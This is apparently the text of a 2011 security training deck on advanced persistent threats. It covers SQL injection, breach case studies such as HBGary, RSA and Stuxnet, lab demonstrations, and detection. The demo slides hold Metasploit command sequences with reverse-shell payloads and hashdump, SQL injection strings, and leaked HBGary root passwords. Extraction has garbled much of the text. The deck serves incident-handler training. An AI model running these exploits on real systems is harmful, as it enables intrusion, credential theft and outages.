• The trick to NR, as with PI, is distribution of
the “server” side of the trojan
j
• bank0famerica.com/login/downloadreport.exe
• Let’s have a look…
80
10/10/2011
APT in Depth
WEB APPLICATIONS: SQL
INJECTION
Un-validated User Input
• Most commonly found vulnerability & most
used in APT attacks involving web apps. User
input is entered via the browser is
automatically trusted by the server to be
correct & logical
• Little to no validation performed by server
code to determine whether or not the input
supplied
supp
ed was
as valid
a d
• Ensure that the application accepts known,
good input & verifies the supplied input at
every instance it is received
81
10/10/2011
Parameter Tampering
• Parameter Tampering
– Attack directed towards business logic
g within the
application
– Attack that takes advantage of programmers’ use of
hidden or fixed form fields as a security measure
Parameter Tampering
• Lets use the example of an online store
– Price information is stored in hidden HTML field with
assigned dollar value
– Assumption: hidden field won’t be edited
– Attacker edits $ value of product in HTML
– Attacker submits altered web page with new “price”
– This is still widespread in many web stores
82
10/10/2011
Parameter Tampering
What if we changed the price from $274.85 to $2.74?
Parameter Tampering
• With a proxy such as Paros Proxy we can
modify
y the request
q
83
10/10/2011
SQL Injection
• SQL injection is a particularly widespread and
dangerous
g
form of injection
j
– To exploit a SQL injection flaw, the attacker must find a
parameter that the web application passes through to a
database
– By carefully embedding malicious SQL commands into
the content of the parameter, the attacker can trick the
web application into forwarding a malicious query to
th database
the
d t b
SQL Injection
• SQL Injection happens when a developer
accepts
p user input
p that is directly
yp
placed into
a SQL Statement and doesn't properly filter
out dangerous characters.
• This can allow an attacker to not only steal
data from your database, but also modify and
delete it.
84
10/10/2011
SQL Injection
• Certain SQL Servers such as Microsoft SQL
Server contain Stored and Extended
Procedures (database server functions).
• If an attacker can obtain access to these
Procedures it may be possible to compromise
the entire machine.
SQL Injection
• Attackers commonly insert single qoutes into
a URL's q
query
y string,
g, or into a forms input
p
field to test for SQL Injection.
• If an attacker receives an error message like
the one below there is a good chance that the
application is vulnerable to SQL Injection.
85
10/10/2011
SQL Injection Example
SQL Injection Example
86
10/10/2011
APT IN DEPTH
DECONSTRUCTING THE
ATTACK
Some Examples
•
•
•
•
•
•
•
Aurora
Stuxnet
HB Gary
Sony PlayStation Network
Night Dragon
RSA
Oakridge
87
10/10/2011
Operation Aurora
Operation Aurora (January 2011)
• Attack started in December, 2010 until beginning of
January, 2011
• Sourced from servers in Taiwan, Texas and Illinois
• Intellectual property was the was they were trying to steal
• Demonstrated several of the key components of an APT
• Speculations are a Chinese state-sponsored attack
• IP addresses that were used had been used in the past
against US companies and was confirmed to be Chinese
State-sponsored (i.e. PLO)
fits the profile
• Google and at least 30 other companies (incl. Yahoo,
Symantec, Juniper, Northrup Grumman and Dow
Chemicals) were hit
88
10/10/2011
• Gipson, Hoffman & Pancione (LA law firm)
e mails from
• Also hit with spear phishing e-mails
people staff recognized with a link/attachment
• Attack reported to the FBI
• They represented a US company over a legal
dispute regarding a copyright infringement
over China’s
China s Green Dam software
• Attack fit the profile of the Google attack
• Attackers targeted software-configuration
management (SCM) systems that held proprietary
information of Google
Google, Adobe and other Fortune 100
companies over several months.
• Zero-day IE vulnerability
• Was based on a vulnerability in IE known to
Microsoft, but not seen actively in the “wild”.
• Affects: Internet Explorer 6 Service Pack 1 on
Microsoft Windows 2000 Service Pack 4,
4 and Internet
Explorer 6, Internet Explorer 7 and Internet Explorer
8 on supported editions of Windows XP, Windows
Server 2003, Windows Vista, Windows Server 2008,
Windows 7, and Windows Server 2008 R2.
89
10/10/2011
• To gain initial access to the victim’s networks, the
attackers started with a targeted spear phishing
attacks against the victim company
• The email appeared to be from someone trusted.
• Contained a link to a Taiwanese website that
hosted malicious JavaScript.
• The malware, in turn, exploited an IE vulnerability
• The exploit triggers when Internet Explorer
attempts to access memory that has been
partially freed.
Operation Aurora
• Once exploited, the victim machines connected to a number of
C&C systems over TCP/443
think covert channel
– Difficult to inspect (encrypted)
– Not out of the ordinary
90
10/10/2011
Operation Aurora
• The attacker then used the owned machines
to attack other systems
y
on the same network
(pivoting).
• In “Operation Aurora”, software configuration
mgmt (SCM) systems were targeted due to
the commonly insecure nature.
e will see tthis
s attac
attack during
du g tthe
e
• We
demonstration section
Stuxnet
91
10/10/2011
Stuxnet
• Very complex SCADA attack
• Stuxnet demonstrated that even isolated
physical networks could be hacked.
• Discovered by VirusBlokAda company in
Minsk, Belarus in July, 2010
• Affecting >15 plants in Iran, Indonesia, India,
UK North America,
UK,
America Korea
Stuxnet
• Targets Siemens WinCCand SIMATIC
Process Control System
y
(PCS7)
(
)
• Programmable logic controller (PLC) rootkit
• Symantec noted that 60% of worldwide
targeted machines were in Iran
• Put their nuclear enrichment program back as
much as 5 yrs!
• Many different ideas of who was responsible
– Some say the US or its allies (i.e. Israel)
92
10/10/2011
Stuxnet
• Attacked Windows systems
• Stuxnet had 5 zero-day vulnerabilities – one or
two is common,
common 5 is not
• And used Conficker (MS08-067) to spread
• Used many vulnerabilities previously patched in
Windows (i.e. MS10-046 LNK Vulnerability)
• Used the Shortcut icon vulnerability (MS10-046)
– affecting every version of Windows since
Wi d
Windows
2000 ((even Wi
Win 95) ((patched
t h dA
Aug 2
2,
2010)
– Allows for execution without even opening a file
Stuxnet
•
•
•
•
Written in different languages (i.e. C, C++)
Used 7 methods of spreading itself
Spread mostly through USB thumb drives
Network shares, print spoolers & Siemens
project files
• UPX packed, XOR encoded everywhere
• Connected to C&C and sent off some
sensitive data, but mostly controlled the PLCs
in-field
93
10/10/2011
Stuxnet
• MS10-046 (LNK Vulnerability) Almost two years old
• MS08-067 (Server Service) Patched for two years
• MS10-061 (Print Spooler) Disclosed over one year ago –
Used to push a file to remote machine and have it execute
• MOF ‘Feature’ Not a vulnerability?
• WinCC DBMS Password Original work
• Step7 Project Files Original work
• MS10-073 ((Kbd Privilege
g Escalation)) Original
g
work
• Rootkit drivers signed with valid certificates (Realtek and
Jmicron)
Stuxnet – Natanz Nuclear Facility
• Iranian IR-1 centrifuge to increase from its normal
operating speed of 1,064 hertz to 1,410 hertz for 15
minutes before returning to its normal frequency
• Twenty-seven days later, the virus went back into
action, slowing the infected centrifuges down to a
few hundred hertz for a full 50 minutes.
• The stresses from the excessive, then slower
speeds caused the aluminum centrifugal tubes to
speeds,
expand, often forcing parts of the centrifuges into
sufficient contact with each other to destroy the
machine.
94
10/10/2011
Stuxnet
• Would record normal readings of the centrifuge
p y these readings
g to technicians
and replay
• Stuxnet would affect the performance of the
equipment and provide false information to
technicians
• The other thing Stuxnet would do was if the
technicians noticed (maybe based on sound) if
the centrifuge was spinning out of control, they
would go for the kill switch – Stuxnet knew how
to disable that!
Future Affects of Stuxnet-like Threats
• Infrastructure-based malware, APT
–
–
–
–
–
Water supplies
pp
Power grids
Nuclear power plants
Air traffic control
Military
95
10/10/2011
RSA
RSA
• We assumed the hack on RSA was just that, a
hack to get into RSA.
• But, this is another indication of APT
• The Lockheed hack may have been planned for
quite a while - Hacking RSA was part of this plan.
• Like the thief that breaks into an engineering
company to steal the plans to a bank's building
layout.
• Wouldn’t surprise me if we don’t see increased
attempts against other sub-contractors
96
10/10/2011
RSA
• Provides SecurID to
White House, CIA,
NSA Pentagon,
NSA,
Pentagon DHS
DHS,
Lockheed, Grumman,
L3, etc.
• Targeted e-mail sent to
EMC employees on
March 3, 2011
• Contained
C
i d an
attachment called
"2011 Recruitment
plan.xls".
RSA
• Opening the XLS
attachment
• Embedded flash
object shows up as
a [X] symbol in the
spreadsheet
97
10/10/2011
RSA
• The Flash object is executed by Excel
• Flash object
j
then uses a Flash Player
y vulnerability
y
(CVE-2011-0609) to execute code and to drop a
Poison Ivy backdoor (or PI-RAT) to the system.
• Poison Ivy is a form of “Remote Access Toolkit” or
RAT.
• The exploit code then closes Excel and the infection
over.
e
iss o
• After this, Poison Ivy connects back to it's server at
good.mincesur.com.
RSA
• The domain mincesur.com has been used in
p
g attacks over an extended
similar espionage
period of time.
• Once the connection is made, the attacker has
full remote access to the infected workstation.
• Even worse, it has full access to network drives
that the user can access.
• Apparently the attackers were able to leverage
this vector further until they gained access to
the critical SecurID data they were looking for.
98
10/10/2011
RSA
• To further obscure the removal of massive
amounts of data,, the aggregated
gg g
data was
placed in several compressed and password
protected RAR files.
• RAR is a compressed archive format for files.
• They used FTP to transfer the RAR files to an
outside
outs
de stag
staging
g server
se e (a co
compromised
p o sed
machine at a hosting provider).
• Finally, the attackers pulled the files from the
external compromised host.
Oakridge Labs
99
10/10/2011
“One of our core competencies at the
lab is cyber security research”
(Thomas Zacharia – Deputy Director,
Oak Ridge National Laboratory)
ORNL
• Deliver scientific discoveries and technical
breakthroughs for clean energy – home of the
1943 “Manhattan Project”
• Spear-phishing campaign starting on April 7, 2011
• Directed at Oak Ridge's business systems
• The attacks were launched through phishing
emails that were sent to some 573 of 5000 lab
employees.
• The emails were disguised to appear like it came
from the lab's HR department – regarding benefits
related changes.
100
10/10/2011
ORNL
• 57 out of some 530 employees clicked on a link in the
email 'campaign', according to Thomas Zacharia,
ORNL deputy lab director
• The emails contained a link that employees were
asked to click on for further information.
• The malware exploited a zero-day flaw in Internet
Explorer, and compromised two of the 57 systems
o sa
an attac
attacker
e to install
sta malware
a aeo
on a use
user’s
s
• Allows
machine if he or she visits a malicious web site.
• Flaw was patched by Microsoft on April 12 (days after
the first e-mail was received – server breach
discovered on April 11).
ORNL
• One of those two computers then spread the
malware to other systems within the lab.
• Some employees appear to have clicked on the
link resulting in an information-stealing malware
program being downloaded on their systems
• Had to shutdown E-mail and Internet connection
• Interestingly enough ORNL is a center of
excellence for cyber security for the DOE and
conducts research into malware and
vulnerabilities in software and hardware as well
as phishing attacks.
101
10/10/2011
Sony Playstation Network
• Hacked by the group
Anonymous in Apr 2011
• Called OpSony
• Reported that a file
named “Anonymous” was
planted on PlayStation
servers and it reportedly
contains the words “We
are Legion.”
• Exposed the names,
birthdays, email
addresses, passwords,
security questions, credit
card details, of all PSN
users.
102
10/10/2011
• Actual attack vector will probably remain unknown
• All the data was unencrypted!
• Theory by security experts is an exploit as simple as
basic SQL Injection/Parameter tampering.
• Anonymous has performed similar attacks on other
Sony realestate:
• http://www.sonymusic.co.jp/bv/crohttp://www sonymusic co jp/bv/cromagnons/track.php?item=7419
Sony PlayStation
• Hacking of 77 million Sony users' data and
caused 23-day
y closure is expected
p
to cost the
company $171M
• Sony said the effects to the company of the
March earthquake the struck Japan will be
about $268.9 million.
e co
company
pa y sa
said
d its
ts loss
oss for
o tthe
e fiscal
sca yea
year
• The
that ended on March 31 will be about $3.18
billion
103
10/10/2011
HB Gary
“We were terrified. I saw all the fruits
of my labor, my livelihood, being
jeopardized.”
(Greg Hoglund – HB Gary)
104
10/10/2011
HBGary Federal – SQL Injection
• Dismantled and humiliated by "Anonymous"
g a SQL Injection
j
attack in a nearly
y
using
meaningless web application as its start point
• Used the hack against HBG’s CMS system
• Rather than using an off-the-shelf CMS, HBG
had a custom app built
• Advantage
g of off-the-shelf - thousands of users
and regular bug fixes, resulting in a much
lesser chance of extant security flaws.
HBGary Federal
• The exact URL used to break into hbgaryfederal.com
was
http://www.hbgaryfederal.com/pages.php?pageNav=
2&page=27
• The URL has two parameters named pageNav and
page, set to the values 2 and 27, respectively.
• One or other or both of these was handled incorrectly
by the CMS, allowing the hackers to retrieve data
from the database that they shouldn't have been able
to get.
105
10/10/2011
HBGary Federal – SQL Injection
• Specifically, the attackers grabbed the user database
from the CMS—the list of usernames, e-mail addresses,
and password hashes for the HBGary employees
authorized to make changes to the CMS.
• It stored only hashed passwords—passwords that have
been mathematically processed with a hash function to
yield a number from which the original password can't be
deciphered (i.e. 897&%$$%)
• Rainbow tables were used to brute force the hashes
• CEO Aaron Barr and COO Ted Vera—used passwords
that were very simple; each was just six lower case
letters and two numbers
HB Gary – Password Reuse?
• This should have only affected HB Gary
Federal
• Unfortunately for HBGary Federal, it was not.
• Neither Aaron nor Ted followed best
practices.
• Instead, they used the same password in a
whole bunch of different places
places, including email, Twitter accounts, and LinkedIn.
• For both men, the passwords allowed
retrieval of e-mail
106
10/10/2011
HB Gary…SSH without certs…bad.
• Along with its web server, HBGary had a Linux
machine, support.hbgary.com, on which many
HBGary employees had shell accounts with ssh
access, each with a password used to authenticate
the user.
• One of these employees was Ted Vera, and his ssh
password was identical to the cracked password he
used in the CMS.
• This gave the hackers immediate access to the
support machine.
• HB Gary could have used certificate based
authentication, but instead opted for passwords only.
HB Gary
• Ted was only a regular non-superuser – meaning he
could only see data owned by his account.
• Unfortunately, the server was vulnerable to privilege
escalation – essentially allowing a normal user to
become “root”.
• The error was published in October 2010 with a full,
working exploit.
• Byy November,
o e be , most
ost d
distributions
st but o s had
ad patc
patches
es
available, and there was no good reason to be
running the exploitable code in February 2011.
107
10/10/2011
HB Gary
• Exploitation of this flaw gave the Anonymous
attackers full access to HB Gary's
y system
y
• It was then that they discovered many
gigabytes of backups and research data,
which they duly purged from the system
HB Gary
• Aaron's password yielded even more fruit. HBGary
used Google Apps for its e-mail services
• For both Aaron and Ted, the password cracking
provided access to their mail.
• But Aaron was no mere user of Google Apps: his
account was also the administrator of the company's
mail.
• With
t hiss higher
g e access, he
e cou
could
d reset
eset tthe
e pass
passwords
o ds
of any mailbox and hence gain access to all the
company's mail—not just his own. It's this capability
that yielded access to Greg Hoglund's mail.
108
10/10/2011
HB Gary
• And what was done with Greg's mail?
engineering, that's
that s what
what.
• A little bit of social engineering
• Contained within Greg's mail were two bits of
useful information.
– The root password to the machine running Greg's
rootkit.com site was either "88j4bb3rw0cky88" or
"88Scr3am3r88".
– Jussi Jaakonaho, "Chief Security Specialist" at Nokia,
had root access.
– Vandalizing the website stored on the machine was
now within reach.
HB Gary
• The attackers just needed a little bit more
information:
– they needed a regular, non-root user account to log in
with, because as a standard security procedure, direct
ssh access with the root account is disabled.
– Armed with the two pieces of knowledge above, and
with Greg's e-mail account in their control, the social
engineers set about their task.
109
10/10/2011
HB Gary
• The e-mail correspondence tells the whole
story:
y
– From: Greg
To: Jussi
Subject: need to ssh into rootkit
im in europe and need to ssh into the server. can you drop
open up firewall and allow ssh through port 59022 or
something vague? and is our root password still
88j4bb3rw0cky88 or did we change to 88Scr3am3r88 ?
thanks
HB Gary
• From: Jussi
To: Greg
Subject: Re: need to ssh into rootkit
hi, do you have public ip? or should i just drop fw? and it is
w0cky - tho no remote root access allowed
• From: Greg
To: Jussi
no i dont have the public ip with me at the moment because im
readyy for a small meeting
g and im in a rush. if anything
y
g jjust reset
my password to changeme123 and give me public ip and ill ssh
in and reset my pw.
110
10/10/2011
HB Gary
•
•
From: Jussi
To: Greg
j
Re: need to ssh into rootkit
Subject:
ok,
it should now accept from anywhere to 47152 as ssh. i am doing
testing so that it works for sure. your password is changeme123
i am online so just shoot me if you need something. in europe, but not
in finland?
_jussi
From: Greg
To: Jussi
if i can squeeze out time maybe we can catch up.. ill be in germany
for a little bit. anyway I can't ssh into rootkit. you sure the ips still
65.74.181.141?
thanks
HB Gary
•
•
•
•
From: Jussi
To: Greg
Subject:
j
does it work now?
From: Greg
To: Jussi
yes jussi thanks did you reset the user greg or?
From: Jussi
To: Greg
Subject:
j
nope. your account is named as hoglund
From: Greg
To: Jussi
yup im logged in thanks ill email you in a few, im backed up
111
10/10/2011
HB Gary
• To be fair to Jussi, the fake Greg appeared to
know the root p
password and,, well,, the e-mails
were coming from Greg's own e-mail
address.
• But over the course of a few e-mails it was
clear that "Greg" had forgotten both his
username and his password.
• And Jussi handed them to him on a platter
Night Dragon
112
10/10/2011
Night Dragon (Jan-Feb 2011)
• Night Dragon is a coordinated covert and targeted
cyberattack
• Conducted against global oil
oil, energy
energy, and
petrochemical companies.
– Exxon Mobil, Royal Dutch Shell, BP, Marathon Oil,
ConocoPhillips and Baker Hughes
• The attack has involved:
–
–
–
–
–
Social engineering,
Spear-phishing attacks,
Exploitation of Microsoft Windows OS vulnerabilities,
Mi
Microsoft
ft Active
A ti Directory
Di t
compromises,
i
The use of remote administration tools (RATs)
• The objective is to harvesting sensitive competitive
proprietary operations and project-financing
information
Night Dragon
113
10/10/2011
Night Dragon
• The Night Dragon attacks work by methodical
and p
progressive
g
intrusions into the targeted
g
infrastructure.
• Several basic activities are performed by the
Night Dragon operation:
– Deploy privately developed and customized RAT tools,
by first compromising perimeter security controls,
th
through
h SQL
SQL-injection
i j ti exploits
l it off extranet
t
t web
b servers,
as well as targeted spear-phishing attacks of mobile
worker laptops,
APT in Depth
DEMONSTRATIONS
114
10/10/2011
Objectives
• To tie everything together we have learned
p an attacker uses to
• Show some of the steps
compromise systems
• To get into the mindset of an attacker so that,
as an incident handler, you can anticipate
their moves
• To gain hands-on experience with various
attack tools
• To understand how the defenses work and
why they are important
So how do hackers do it?
• They have a process (with steps) of their
own!
– Step 1 – Reconnaissance “Recon”
– Step 2 – Scanning
– Step 3 – Exploit Systems
• Gaining Access
• Elevating Access
• App-level
App level Attacks
• Denial of Service
– Step 4 – Keeping Access
– Step 5 – Covering the Tracks
115
10/10/2011
Step 1 - Recon
• Open source investigation to gain information
about a target
g
Step 2 - Scanning
• Attacker uses a variety of mechanisms to
survey
y a target
g to find holes in target’s
g
defenses.
116
10/10/2011
Step 3 - Exploiting
• The attacker tries to gain access, undermine
an application
pp
or deny
y access to other users.
Step 4 – Keeping Access
• Attacker maintains access by manipulating
the software installed on the system
y
to
achieve backdoor access.
117
10/10/2011
Step 5 – Covering the Tracks
• The attackers maintain their hard-fought
access by
y covering
g their tracks.
• They hide from users and systems
administrators using a variety of techniques
STEP 1 - Recon
118
10/10/2011
Recon
• Reconnaissance is “casing the joint”
• Two general types of attackers:
– What we used to call “script kiddies” – Look for low hanging
fruit, and may skip this step
– Attackers out to get a particular site – this step is extremely
important
• To begin an attack, your adversary will gather as
much information as possible from open sources.
• Before bandits rob a bank, they will visit the
branch, look at the times the guards enter and
leave, and observe the location of cameras.
Recon
•
•
•
•
•
•
•
Domain Information Leakage (aka whois)
DNS Interrogation
Web site searches
Using Google as a Recon tool
Sam Spade
Web-based recon and attack tools
Think Advanced Persistent Threat!
119
10/10/2011
STEP 2 - Scanning
Scanning
• After completing a thorough reconnaissance
of the target,
g , attackers begin
g scans to find
openings in the target system
120
10/10/2011
Scanning the Perimeter
• Scanning is normally one of the initial
activities an attacker may
y conduct to identify
y
any vulnerable hosts that can be exploited
• We see numerous “port scanning” event
What does this look like…
121
10/10/2011
Running NMAP
• Simple ARP Ping Scan
– nmap
p -v -sn 192.168.67.0/24 ((ARP Ping
g Scan))
• Run a port scan
– nmap -sV 192.168.67.0/24
– In our case (to save time) – nmap –sV 192.168.67.10-11
Nmap Demonstration
122
10/10/2011
What Did nmap tell us?
• 192.168.67.10
–
–
–
–
Probably Windows Box
Web server
DNS
lots of SMB stuff (AD
maybe?)
• 192.168.67.11
– Probably Windows Box
– RPC stuff
– uPNP
• 192.168.67.12
– Attacker Machine
• 192.168.67.13
–
–
–
–
–
–
–
ftp (vsftpd)
SSH – OpenSSH
HTTP – Apache
Samba
NFS
MySQL
Probable UNIX
O/S Fingerprinting
123
10/10/2011
O/S Fingerprinting
• OS Fingerprinting is a method of detecting the
remote host’s operating
p
g system
y
using
g
information leaked by that host’s TCP stack. To
do this, we use:
– the responses it gives to carefully crafted packets (active
mode)
– or by observing captured network traffic (passive mode).
• These methods are possible because each OS
implements their TCP stack differently.
• OS Fingerprinting (ab)uses these differences.
Use of nmap for O/S Fingerprinting
• nmap -O 192.168.67.10 192.168.67.11
192.168.67.13
– 192.168.67.10
– 192.168.67.11
– 192.168.67.13
Windows XP (maybe)
Windows XP
Linux
124
10/10/2011
Nmap Demonstration
Vulnerability Scanners
125
10/10/2011
• Tools to help map a network, scan for open
ports, and find various vulnerabilities
• Test against a list of know exploits
– What about the unknown?
– That’s why we want to have security in-depth!
• Generate pretty reports
– Information overload
– What do you do with a 2,000 page report?
• Diff
Difference b
between
t
vulnerability
l
bilit scanning
i and
d
exploitation?
– Vulnerability scan only tests theoretically that a system is
vulnerable
system is not normally exploited
•
•
•
•
•
Vulnerability database - It contains a list of
vulnerabilities for a variety of systems and describes
how those vulnerabilities should be checked.
User configuration tool - By interacting with this
component of the vulnerability scanner, the user
selects the target systems and identifies which
vulnerability checks to run.
Scanning engine - Based on the vulnerability
database and user configuration, this tool
formulates packets and sends them to the target to
determine whether vulnerabilities are present.
Knowledge base of current active scan – Keeps
track of the current scan, remembering the
discovered vulnerabilities, and feeding data to the
scanning engine.
Results repository and report generation tool Generates reports for its user, explaining which
vulnerabilities were discovered on which targets and
possibly recommending remedial actions for dealing
with the discovered flaws.
126
10/10/2011
A bunch of vulnerability scanners
Vulnerability Scanner - Nessus
127
10/10/2011
Nessus
• Free (kind of), open-source general vulnerability
scanner maintained by Tenable Network Security
– Software is free
– Signatures are either free (home feed) or $$$ (professional
feed) – Difference is how often you get updates
• As such it is used by the white hat community as
well as the black hat community
• Project started by Renaud Deraison
• Available at www.nessus.org
www nessus org
• Consists of a client and server, with modular
plug-ins for individual tests
• Now the client is web-based
Nessus - Architecture
• Client-server
architecture
• Both can run on the
same machine
• Tenable now will
outsource the server
component
co
po e t as a
an ASP
S
• Information sent
between the two is
encrypted
128
10/10/2011
Nessus - Platform
• Server
–
–
–
–
–
Windows ((XP,, 2003,, Vista,, 2008,, 7))
Mac OS X
Linux (Debian, Fedora, Red Hat, SUSE, Ubuntu)
FreeBSD
Solaris 10
• Client
– Pretty much anything with a browser (including the
iPhone)
Nessus Plugins
• There is a defined API for writing Nessus
p g
plugins
– Some plugins written in C
– Plugins can be written in the Nessus Attack Scripting
Language (NASL)
– One plugin is in charge of doing one attack and to
report the rest to the Nessus server
– Each p
plugin
g can use some functions of the Nessus
library, called libnessus, and store information in a
shared knowledge base.
129
10/10/2011
Example Nessus Output
Running Nessus
• https://192.168.67.12:8834
Let’s
s create a scan policy
• Let
130
10/10/2011
Nessus Demonstration
Running Nessus
• 192.168.67.10
– Arbitrary code can be executed on the remote host due to a
flaw in the 'Server' service.
– The remote host is vulnerable to a buffer overrun in the
'Server’ service that may allow an attacker to execute
arbitrary code on the remote host with the 'System'
privileges.
• 192.168.67.10
– Arbitraryy code can be executed on the remote host through
g
the WINS service
– The remote host has a Windows WINS server installed. The
remote version of this server has two vulnerabilities that may
allow an attacker to execute arbitrary code on the remote
system
131
10/10/2011
Running Nessus
• 192.168.67.10
– Arbitrary code can be executed on the remote host.
– The remote host is running a version of Windows that has a
flaw in its RPC interface, which may allow an attacker to
execute arbitrary code and gain SYSTEM privileges.
• 192.168.67.10
– The remote Windows host has an ASN.1 library that could
allow an attacker to execute arbitrary code on this host.
– To exploit this flaw,
flaw an attacker would need to send a
specially crafted ASN.1 encoded packet with improperly
advertised lengths.
Running Nessus
• 192.168.67.11
– Arbitrary
y code can be executed on the remote host due
to a flaw in the 'Server' service
– The remote host is vulnerable to a buffer overrun in the
'Server’ service that may allow an attacker to execute
arbitrary code on the remote host with the 'System'
privileges.
– Exploitable With: Canvas (CANVAS), Core Impact,
M t
Metasploit
l it (Microsoft
(Mi
ft Server
S
Service
S i Relative
R l ti P
Path
th
Stack Corruption)
132
10/10/2011
Running Nessus
• 192.168.67.13
– The remote FTP server is vulnerable to a FTP server
bounce attack.
– It is possible to force the remote FTP server to connect
to third parties using the PORT command.
• 192.168.67.13
– An administrative account on the remote host uses a
weak password.
– The account 'root' has the password 'password'. An
attacker may use it to gain further privileges on this
system
STEP 3 - Exploiting
133
10/10/2011
Exploiting
• Using the information we discovered
regarding
g
gp
ports and services,, research known
vulnerabilities
• Similarly, use the results from Nessus to
determine exploit for a given vulnerability
MetaSploit
• MS KB numbers (i.e.
MS08-067) translate to
MetaSploit exploit modules
• http://www.metasploit.net/
modules
• Search by:
– (OSVD) Open Source
Vulnerability Database ID
– BugTraq ID
– Full Text Search
– (CVE) Common
Vulnerabilities Exposures ID
– Microsoft Security Bulletin ID
134
10/10/2011
MetaSploit – Example #1
• MS08-067: Vulnerability in Server service
could allow remote code execution
– Defect in Netapi32.dll
• MS08-67 on 192.168.67.11
–
–
–
–
–
–
Msf > use exploit/windows/smb/ms08_067_netapi
Msf > Show payloads
Msf > Set PAYLOAD windows/meterpreter/reverse_tcp
Msf > Set LHOST [My_IP_Address]
Msf > Set RHOST [Victim_IP_Address]
Msf > exploit
MetaSploit – Example #1
• Now that we have executed an exploit
–
–
–
–
–
–
Let’s own the box
Meterpreter > Sysinfo
meterpreter > getsystem (Elevate privilege)
meterpreter > Getprivs
meterpreter > Shell (grab a shell)
Meterpreter > Hashdump (dump the local SAM)
• Ophcrack
O h
k anyone?
?
135
10/10/2011
Metasploit Demonstration
Keeping Access?
•
•
•
•
Rootkit?
Backdoor?
Backup account?
RDP?
136
10/10/2011
How about a bit of DoS?
• 192.168.67.10 – Our Windows 2003 Domain Controller
• MS04-007
– Microsoft ASN.1 Library Bitstring Heap Overflow
– This is an exploit for a previously undisclosed vulnerability in
the bit string decoding code in the Microsoft ASN.1 library.
– You are only allowed one attempt with this vulnerability. If the
payload fails to execute, the LSASS system service will crash
and the target system will automatically reboot itself in 60
seconds. If the p
payload
y
succeeds,, the system
y
will no longer
g be
able to process authentication requests, denying all attempts
to login through SMB or at the console. A reboot is required to
restore proper functioning of an exploited system.
How about a bit of DoS?
• msf > use exploit/windows/smb/ms04_007_killbill
• msf exploit(ms04_007_killbill) > show payloads
• msf exploit(ms04_007_killbill) > set PAYLOAD
windows/meterpreter/reverse_tcp
• msf exploit(ms04_007_killbill) > set LHOST [MY IP ADDRESS]
• msf exploit(ms04_007_killbill) > set RHOST [TARGET IP]
• msf exploit(ms04_007_killbill) > exploit
137
10/10/2011
Metasploit Demonstration
Web Applications
138
10/10/2011
SQL Injection - Review
• SQL injection is a particularly widespread and
dangerous
g
form of injection
j
– To exploit a SQL injection flaw, the attacker must find a
parameter that the web application passes through to a
database
– By carefully embedding malicious SQL commands into
the content of the parameter, the attacker can trick the
web application into forwarding a malicious query to
th database
the
d t b
Hacme Bank
•
•
•
•
Windows 2003 Server (patched)
Microsoft IIS web server
Microsoft SQL Server 2005
.NET Framework
139
10/10/2011
Hacme Bank
• Online banking application
• Offers a bunch of features
– Transfer funds - The application allows users of the
applications to transfer funds from one account to another.
– Request a loan - The users will be able to request a loan
from the application to any of their internal accounts. The
interest rates are preset and vary with the loan period of the
loan requested
– View transactions
– Manage your bank accounts
– Change password
– Post messages
Hacme Bank
• Offers a bunch of features
– Admin interface
• Manage all accounts
• Manage messages
• Manage users
• Unrestricted SQL queries
140
10/10/2011
Let’s Test the App…
• Username: jv Password:jv789
• Username: jm Password: jm789
• Username: jc Password: jc789
SQL Demonstration
141
10/10/2011
Demo #1
•
•
•
•
' OR 1=1–
Well known hack…
hack
In the username or password field
Standard login may look like this:
– SELECT Count(*) FROM Users WHERE
UserName='Paul' AND Password='password‘
• Ours comes out:
– SELECT Count(*) FROM Users WHERE UserName=''
Or 1=1
• Let’s try it…
Demo #1
• The expression 1=1 is always true for every
row in the table,, and a true expression
p
or'd
with another expression will always return
true.
• So, assuming there's at least one row in the
Users table, this SQL will always return a
nonzero count of records.
142
10/10/2011
Demo #2
• ' HAVING 1=1-• What does the error give us?
• Using the error information above, the
attacker can determine that the name of the
table storing login information is FSB_USERS
and that it has a column named USER_ID.
Demo #2
• ' UNION SELECT * FROM FSB_USERS
WHERE user_id = 'JV' GROUP BY user_id;-;
• What does the error give us?
• This process is known as database
enumeration.
• Armed with this information, the attacker now
attempts to determine the data type of each
column.
143
10/10/2011
Demo #2
• '; INSERT INTO FSB_USERS
((USER_NAME,, LOGIN_ID,, PASSWORD,,
CREATION_DATE) VALUES('HAX0R12',
'HACKME12', 'EASY32', GETDATE());-• Any thoughts on what this will do?
Browser Exploits
144
10/10/2011
Browser Exploit
•
•
•
•
Internet Explorer Memory Corruption
MS10-002
MS10
002 – aka “Aurora”
Aurora
Solution to Aurora was DEP & ALSR
We are going to run this on our Windows XP
system
• Just needed the user to click on a link that
was trusted on a website or e
e-mail
mail
Aurora Demonstration
145
10/10/2011
Browser Exploit
• Internet Explorer CSS Recursive Import Use
After Free
• Exploits a memory corruption vulnerability within
Microsoft's HTML engine (mshtml)
• When parsing an HTML page containing a
recursive CSS import, a C++ object is deleted
and later reused.
• This leads to arbitrary code execution.
• This exploit utilizes a combination of heap
spraying and the .NET 2.0 'mscorie.dll' module
Browser Exploit
• This module is reliable on all Windows versions
with .NET 2.0.50727 installed (IE 6-8)
• Specifically uses exploit documented in MS11003.
• Just needed the user to click on a link that was
trusted on a website or e-mail
• Bypasses DEP and ASLR
– Address space layout randomization - technique which
involves randomly arranging the positions of key data areas,
usually including the base of the executable and position of
libraries, heap, and stack, in a process's address space.
– Data Execution prevention - prevent an application or service
from executing code from a non-executable memory region
146
10/10/2011
DEP Bypass Demonstration
APT IN DEPTH
DETECTING APT
147
10/10/2011
All About the Traffic...
• As we have seen… successful targeted
attacks depend on remote access and control
• The network activity associated with remote
control can be identified, contained and
disrupted through the analysis of outbound
network traffic.
• Important to know what is normal and what is
not
baselining
• If an APT attacker wants to stay hidden, he
will try to mimic normal traffic/access as much
as possible
• Look for outbound traffic patterns that are
out of the ordinary
y
– DNS requests to non-internal name servers
– Large amounts of traffic leaving your network to non
North American destinations
– Port 80/443 requests to sites in *.ru and *.cn
– Access to known malware domains
– Use of credentials on interesting or abnormal systems
148
10/10/2011
• Look for inbound traffic patterns that are out
of the ordinaryy
– Connections to interesting ports from unknown sources
such as TCP/1433, TCP/8080, TCP/53, UDP/53
– “Normal” looking traffic from countries you do not do
business with (i.e. China
TCP/80)
– Consistent inbound “portscan” traffic from eastern
Europe and Asia on non-well known ports (i.e. C&C)
All About the Traffic
149
10/10/2011
All About the Traffic – Typical Botnet
Look at all the sources
of information…
Web Traffic
• Another important source of information
• If you can pull it into a SIEM, you’re job could be
easier
• Manually, you want to look at the following:
